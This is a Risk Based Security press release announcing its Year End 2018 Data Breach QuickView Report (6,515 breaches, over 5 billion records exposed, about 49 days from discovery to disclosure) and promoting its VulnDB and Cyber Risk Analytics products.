Because RBS believes that the ability to properly apply vulnerability data is vital to business decision making processes, the VulnDB QuickView report is created through extensive research conducted by Risk Based Security’s VulnDB team. It is designed to provide an executive level summary of the key findings from RBS’ analysis of vulnerabilities disclosed in 2018. Contact Risk Based Security for any specific analysis of the 2018 vulnerabilities.

Get your copy of the 2018 Year End Vulnerability QuickView report here


VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API for easy integration into GRC tools and ticketing systems. VulnDB allows organizations to search on and be alerted to the latest vulnerabilities, both in end-user software and the third-party libraries or dependencies that help build applications. A subscription to VulnDB provides organizations with simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

For more information, please visit:

https://www.riskbasedsecurity.com/

https://vulndb.cyberriskanalytics.com/

https://www.cyberriskanalytics.com/

https://www.yourciso.com/

Contact RBS via [email protected] or call 855-RBS-RISK

Over 6,500 Data Breaches and More Than 5 Billion Records Exposed in 2018

Risk Based Security today announced the release of its Year End 2018 Data Breach QuickView Report, showing there were 6,515 publicly disclosed data compromise events through December 31, 2018, exposing over 5 billion sensitive records. While the year ended below 2017’s high mark of 6,728 reported breaches, a continuing slow trickle of new breach information may end up placing 2018 in the top spot.

“It’s been an unusual year for breach activity,” commented Inga Goddijn, Executive Vice President of Risk Based Security. “We’ve been monitoring breach events for more than a dozen years now and this is the first time we’ve observed a slow start to the year followed by a growing number of disclosures as the months pass. We suspect various factors including the allure of crypto mining had an impact on breach activity early in the year, but disclosures rebounded throughout the summer and into the last quarter.”

Following on the theme of disclosure, this year the Data Breach Quick View Reports have been examining the average number of days between breach discovery and reporting. Ms Goddijn said of the work, “we were curious to see if the General Data Protection Regulation (GDPR) would have a discernible impact on how long it takes for an organization to go public with a breach report.” Curiously, the average number of days between discovery and disclosure has been approximately 49 days for the past two years. Ms Goddijn commented, “from 2014 until 2017, the average number of days had been declining. We assumed awareness of GDPR reporting requirements would put pressure on organizations to continue to close the gap. So it was surprising to see 2018 end at an average of 49.6 days, slightly above 2017’s average of 48.6 days.”

One possible reason for the lack of improvement is the different obligations and timelines that apply for notifying regulators of a breach versus notifying individuals at risk of harm. It is worthwhile to keep in mind that while much has been said about the GDPR’s 72 hour window for reporting a breach to regulators, individuals need only be notified if there is a high risk of harm. What’s more, if the notification to individuals is triggered, the notice must be made without unreasonable delay rather than within a specified number of days. As is evident in recent reporting, this can generate a significant number of disclosures to regulators – ranging from minor data handling errors to serious data compromise events – but not necessarily impact the number of breaches that actually see the light of day.

Ms Goddijn concluded, “overall, we’re encouraged by the results from 2018. The number of records exposed did come down about 36% compared to last year and while the number of breaches is still quite high, we did not see a repeat of widespread events like WannaCry and Petya/NotPetya. After year upon year of bad news, we’ll take improvement where it can be found.”

About the Data Breach QuickView Report

The Data Breach QuickView report is made possible through the research conducted by Risk Based Security. It is designed to provide an executive-level summary of the key findings from RBS’ analysis of breach activity disclosed in 2018. Contact Risk Based Security for any focused analysis of the 2018 breaches of specific interest to your organization.

Get your copy of the Year End 2018 Data Breach QuickView Report

Tune In To The 2018 Year End Data Breach Quick View Report Webinar

We invite you to attend “The Data Breach Landscape – Trends and Highlights From 2018” webinar being held on February 28th at 11:30 a.m. Central where we’ll take a deeper dive into the Year End Data Breach report. Please click the link below to register or watch on demand:

Register For The Data Breach Landscape Webinar


Cyber Risk Analytics (CRA) provides actionable threat intelligence about organizations that have had a data breach or leaked credentials. This enables organizations to reduce exposure to the threats most likely to impact them and their vendor base. In addition, our PreBreach vendor risk rating, the result of a deep view into the metrics driving cyber exposures, is used to better understand the digital hygiene of an organization and the likelihood of a future data breach. The integration of PreBreach ratings into security processes, vendor management programs, cyber insurance processes and risk management tools allows organizations to avoid costly risk assessments, while enabling businesses to understand their risk posture and act quickly and appropriately to proactively protect their most critical information assets.

Risk Based Security has a suite of products that enables organizations to make data-driven decisions to effectively manage and prioritize risk mitigation. See how VulnDB, Cyber Risk Analytics, and YourCISO can help you or your vendors stay secure in this rapidly evolving environment.